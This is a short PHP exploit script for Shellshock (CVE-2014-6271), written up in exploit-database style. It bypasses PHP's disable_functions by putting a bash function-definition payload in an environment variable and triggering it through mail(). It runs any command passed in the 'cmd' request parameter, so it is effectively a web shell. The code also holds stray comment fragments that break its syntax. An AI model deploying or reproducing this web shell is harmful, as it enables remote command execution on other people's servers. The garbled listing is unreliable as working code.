# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date : 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http:
# Software Link: http:
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271
<?php
function shellshock( $cmd ) {
mail.c:283
if ( strstr ( readlink ( "/bin/sh" ), "bash" ) != FALSE) {
$tmp = tempnam( "." , "data" );
putenv( "PHP_LOL=() { x; }; $cmd >$tmp 2>&1" );
whose names
that
empty ,
mail( "a@127.0.0.1" , "" , "" , "" , "-bv" );
send any mail
}
else return "Not vuln (not bash)" ;
$output = @ file_get_contents ( $tmp );
@unlink( $tmp );
if ( $output != "" ) return $output ;
else return "No output, or not vuln." ;
}
shellshock( $_REQUEST [ "cmd" ]);
?>
|